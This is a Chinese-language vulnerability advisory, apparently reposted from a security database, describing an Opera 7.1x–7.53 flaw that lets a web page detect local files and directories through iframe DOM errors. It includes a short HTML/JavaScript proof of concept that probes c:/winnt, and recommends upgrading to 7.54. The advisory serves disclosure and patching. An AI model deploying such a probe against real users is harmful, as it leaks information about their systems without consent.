发布日期：2004-08-17
更新日期：2004-08-18

受影响系统：

Opera Software Opera Web Browser 7.53
Opera Software Opera Web Browser 7.52
Opera Software Opera Web Browser 7.51
Opera Software Opera Web Browser 7.50
Opera Software Opera Web Browser 7.23
Opera Software Opera Web Browser 7.22
Opera Software Opera Web Browser 7.21
Opera Software Opera Web Browser 7.20
Opera Software Opera Web Browser 7.11b
Opera Software Opera Web Browser 7.11
Opera Software Opera Web Browser 7.10

不受影响系统：

Opera Software Opera Web Browser 7.54

描述：

---

BUGTRAQ  ID: 10961

Opera是一款流行的WEB浏览器。

Opera存在设计错误，远程攻击者可以利用这个漏洞判断系统文件和目录是否存在。

当不存在的文件或目录分配给一个iframe，就会返回一个错误给用户，并且实际的iframe位置没有更改。

这种情况可以使攻击者使用可访问iframe(在相同域中)来判断系统文件和目录是否存在。通过更改它的URL到某一个文件或目录位置，然后当尝试访问它的DOM时检查是否有错误返回，就可以判断资源是否存在。导致系统敏感信息泄露。

<*来源：GreyMagic Security Advisory （security@greymagic.com）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=109276651431025&q=raw
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

GreyMagic Security Advisory （security@greymagic.com）提供了如下测试方法：

<iframe src="blank.html"></iframe>
<script type="text/javascript">
onload=function () {
    var sLocal="c:/winnt";
    frames[0].location.href=sLocal;
    setTimeout(
        function () {
            try {
                frames[0].document;
                alert(sLocal+" does not exists.");
            } catch (oErr) {
                alert(sLocal+" exists.");
            }
        },
        250
    );
}
</script>

建议：

---

厂商补丁：

Opera Software
--------------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载升级到Opera 7.54版本：

http://www.opera.com

浏览次数：3267
严重程度：0（网友投票）